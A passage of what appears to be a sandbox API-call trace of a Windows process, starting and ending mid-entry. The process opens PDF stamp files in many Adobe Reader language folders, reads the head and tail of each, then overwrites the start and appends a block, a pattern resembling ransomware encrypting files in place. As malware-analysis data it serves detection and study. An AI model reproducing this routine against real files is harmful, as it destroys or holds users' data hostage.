lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xb6cc [0062.701] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.701] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.701] ReleaseMutex (hMutex=0x168) returned 1 [0062.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f734cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.702] ReadFile (in: hFile=0x1e8, lpBuffer=0x2699c18, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2699c18*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.716] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa6cc [0062.716] ReadFile (in: hFile=0x1e8, lpBuffer=0x269ec78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x269ec78*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.743] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa6cc [0062.743] WriteFile (in: hFile=0x1e8, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.744] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0062.744] WriteFile (in: hFile=0x1e8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.744] CloseHandle (hObject=0x1e8) returned 1 [0062.764] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0062.764] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.765] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x17b14 [0062.765] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0062.765] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.765] ReleaseMutex (hMutex=0x168) returned 1 [0062.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.765] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.786] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x16b14 [0062.786] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.796] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x16b14 [0062.796] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ec3568*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec3568*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.797] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0062.797] WriteFile (in: hFile=0x1e8, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.798] CloseHandle (hObject=0x1e8) returned 1 [0063.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\KOR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\kor\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0063.906] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0063.907] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x12b04 [0063.909] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0063.909] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.909] ReleaseMutex (hMutex=0x168) returned 1 [0063.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0063.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0063.910] ReadFile (in: hFile=0x1e8, lpBuffer=0x2698418, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0063.943] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11b04 [0063.943] ReadFile (in: hFile=0x1e8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.965] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11b04 [0063.965] WriteFile (in: hFile=0x1e8, lpBuffer=0x269e4a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e4a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.966] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0063.966] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.966] CloseHandle (hObject=0x1e8) returned 1 [0063.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0063.979] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0063.979] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x95a4 [0063.980] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0063.980] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.980] ReleaseMutex (hMutex=0x168) returned 1 [0063.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f733ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0063.980] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.002] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x85a4 [0064.002] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.014] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x85a4 [0064.015] WriteFile (in: hFile=0x1e8, lpBuffer=0x269e478*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x269e478*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.015] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.015] WriteFile (in: hFile=0x1e8, lpBuffer=0x2698418*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2698418*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.015] CloseHandle (hObject=0x1e8) returned 1 [0064.028] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ptb\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0064.029] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.029] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc4a8 [0064.029] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.029] ReleaseMutex (hMutex=0x168) returned 1 [0064.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f733ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.029] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.057] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb4a8 [0064.058] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.068] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb4a8 [0064.068] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.068] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.068] WriteFile (in: hFile=0x1e8, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.069] CloseHandle (hObject=0x1e8) returned 1 [0064.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0064.329] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.329] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2fe62 [0064.329] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.329] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.329] ReleaseMutex (hMutex=0x168) returned 1 [0064.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.329] ReadFile (in: hFile=0x1e8, lpBuffer=0x25af048, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25af048*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0064.332] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2ee62 [0064.333] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.379] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x2ee62 [0064.380] WriteFile (in: hFile=0x1e8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.380] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.381] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0064.381] CloseHandle (hObject=0x1e8) returned 1 [0064.391] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\faces.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0064.391] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.391] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x80f5 [0064.391] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.392] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.392] ReleaseMutex (hMutex=0x168) returned 1 [0064.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0064.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Faces.pdf", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Faces.pdf", lpUsedDefaultChar=0x0) returned 9 [0064.392] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.401] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x70f5 [0064.401] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.402] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x70f5 [0064.402] WriteFile (in: hFile=0x1e8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.402] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0064.402] WriteFile (in: hFile=0x1e8, lpBuffer=0x2874088*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2874088*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.402] CloseHandle (hObject=0x1e8) returned 1 [0064.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0064.410] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.410] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x12fb3 [0064.410] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0064.410] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.566] ReleaseMutex (hMutex=0x168) returned 1 [0064.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0064.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0064.755] ReadFile (in: hFile=0x1e8, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.759] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11fb3 [0064.759] ReadFile (in: hFile=0x1e8, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.760] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, 